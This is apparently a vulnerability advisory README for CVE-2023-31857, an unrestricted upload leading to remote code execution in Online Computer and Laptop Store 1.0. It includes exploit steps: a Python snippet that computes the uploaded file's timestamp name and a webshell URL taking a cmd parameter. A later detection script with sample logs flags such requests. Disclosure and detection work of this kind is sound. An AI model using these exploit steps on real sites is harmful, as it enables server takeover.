CVE-2023-31857: php-ocls/README.md at main · Jadore147258369/php-ocls

Sourcecodester Online Computer and Laptop Store 1.0 allows unrestricted file upload and can lead to remote code execution. The vulnerability path is /classes/Users.php?f=save.


php-ocls

php-ocls (Online Computer and Laptop Store 1.0) allows unrestricted file upload, which can lead to remote code execution. The vulnerable code path is /classes/Users.php?f=save. The name of the uploaded file can easily be derived from the upload timestamp.

1. Send the request and note when it was sent.

2. Calculate the timestamp.

   ```python
   import time

   # The time noted in step 1, expressed in the server's local timezone
   timeArray = time.strptime('2023-04-24 13:40:00', "%Y-%m-%d %H:%M:%S")
   # mktime() interprets the struct as local time, so the machine running this
   # must be set to the same timezone as the server that named the file
   time_format = time.mktime(timeArray)
   print(int(time_format))
   ```

3. Get Shell. http://192.168.3.43/php-ocls/uploads/1682314800_shell.php?cmd=phpinfo();
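Because the stored file name is just `<unix timestamp>_<original name>` under /uploads, the same pattern that makes the file easy to find also makes exploitation easy to spot in web server logs. The script below is an added detection example, not code from the php-ocls repository; it assumes a combined-format access log (Apache/nginx) and uses constructed sample lines that mirror the request sequence described above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); not taken from the page or any real server.
SAMPLE_LOG = """\
192.168.3.10 - - [24/Apr/2023:13:40:00 +0800] "POST /php-ocls/classes/Users.php?f=save HTTP/1.1" 200 15 "-" "python-requests/2.28"
192.168.3.10 - - [24/Apr/2023:13:40:02 +0800] "GET /php-ocls/uploads/1682314800_shell.php?cmd=id HTTP/1.1" 200 431 "-" "python-requests/2.28"
192.168.3.20 - - [24/Apr/2023:13:41:10 +0800] "GET /php-ocls/uploads/1682314810_avatar.png HTTP/1.1" 200 8312 "-" "Mozilla/5.0"
192.168.3.30 - - [24/Apr/2023:13:42:00 +0800] "GET /php-ocls/index.php?page=home HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Uploads are stored as <10-digit unix time>_<name>; a PHP-executable extension there is the red flag.
UPLOAD_SCRIPT_RE = re.compile(r'/uploads/\d{10}_[^/]+\.(?:php|phtml|phar)\d?$', re.IGNORECASE)


def analyze(log_text):
    """Return (ip, timestamp, reason, target) tuples for suspicious requests in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m['target'])
        qs = parse_qs(url.query)
        # Writes to the profile-save handler are the upload vector; record them for correlation.
        if m['method'] == 'POST' and url.path.endswith('/classes/Users.php') and qs.get('f') == ['save']:
            findings.append((m['ip'], m['ts'], 'profile-save upload endpoint hit', m['target']))
        # Any script fetched from the uploads directory should never happen on a healthy install.
        elif UPLOAD_SCRIPT_RE.search(url.path):
            reason = 'script executed from uploads dir'
            if 'cmd' in qs:
                reason += ' with cmd parameter'
            findings.append((m['ip'], m['ts'], reason, m['target']))
    return findings


if __name__ == '__main__':
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A POST to the save handler followed within seconds by a GET for a timestamp-prefixed `.php` file from the same client is the sequence to alert on; the benign image upload on the third line is deliberately not flagged.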
